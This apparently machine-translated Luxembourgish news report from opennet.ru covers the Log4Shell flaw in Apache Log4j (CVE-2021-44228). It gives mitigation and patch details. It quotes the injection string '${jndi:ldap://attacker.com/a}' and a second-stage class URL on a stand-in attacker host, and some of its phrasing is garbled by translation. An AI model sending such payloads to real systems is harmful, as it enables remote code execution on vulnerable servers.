Am Apache Log4j, e populäre Kader fir d'Organisatioun vu Logbicher an Java Uwendungen, gouf eng kritesch Schwachstelle identifizéiert, déi et erlaabt arbiträr Code auszeféieren wann e speziell formatéierte Wäert am "{jndi:URL}" Format an de Log geschriwwe gëtt. D'Attack kann op Java Uwendungen duerchgefouert ginn, déi Wäerter protokolléieren, déi aus externe Quelle kritt goufen, zum Beispill wann Dir problematesch Wäerter an Fehlermeldungen weist.
Et gëtt bemierkt datt bal all Projete mat Kaderen wéi Apache Struts, Apache Solr, Apache Druid oder Apache Flink vum Problem betraff sinn, dorënner Steam, Apple iCloud, Minecraft Clienten a Serveren. Et gëtt erwaart datt d'Schwachstelle kéint zu enger Welle vu massiven Attacken op Firmenapplikatiounen féieren, d'Geschicht vu kritesche Schwachstelle widderhuelen am Apache Struts Kader, deen, no enger rauer Schätzung, a Webapplikatiounen vu 65% vum Fortune benotzt gëtt 100 Firmen.Dozou gehéiert och Versich, d'Netz ze scannen fir vulnerabel Systemer.
De Problem gëtt verschäerft duerch d'Tatsaach datt e funktionnéierend Exploit scho publizéiert gouf, awer Fixe fir déi stabil Branchen sinn nach net kompiléiert. Den CVE Identifizéierer ass nach net zougewisen ginn. De Fix ass nëmmen an der log4j-2.15.0-rc1 Testzweig abegraff. Als Léisung fir d'Blockéierung vun der Schwachstelle ass et recommandéiert de log4j2.formatMsgNoLookups Parameter op richteg ze setzen.
De Problem gouf verursaacht duerch d'Tatsaach datt log4j d'Veraarbechtung vu spezielle Masken "{}" ënnerstëtzt an de Linnenausgang zum Logbuch, an deem JNDI (Java Naming and Directory Interface) Ufroen ausgefouert kënne ginn. D'Attack geet erof op eng String mat der Ersatz "${jndi:ldap://attacker.com/a}", bei der Veraarbechtung, déi log4j eng LDAP-Ufro fir de Wee an d'Java Klass un den attacker.com Server schéckt . De Wee vum Server vum Ugräifer zréck (zum Beispill http://second-stage.attacker.com/Exploit.class) gëtt am Kontext vum aktuelle Prozess gelueden an ausgefouert, wat den Ugräifer erlaabt arbiträr Code op der System mat de Rechter vun der aktueller Applikatioun.
Addendum 1: Der Schwachstelle gouf den Identifizéierer CVE-2021-44228 zougewisen.
Addendum 2: E Wee fir de Schutz, deen duerch Verëffentlechung log4j-2.15.0-rc1 bäigefüügt gëtt, ëmzegoen, gouf identifizéiert. En neien Update, log4j-2.15.0-rc2, gouf proposéiert mat méi komplette Schutz géint d'Schwachheet. De Code beliicht d'Ännerung verbonne mat der Verontreiung vun enger anormaler Kënnegung am Fall vun enger falsch formatéierter JNDI URL.
Source: opennet.ru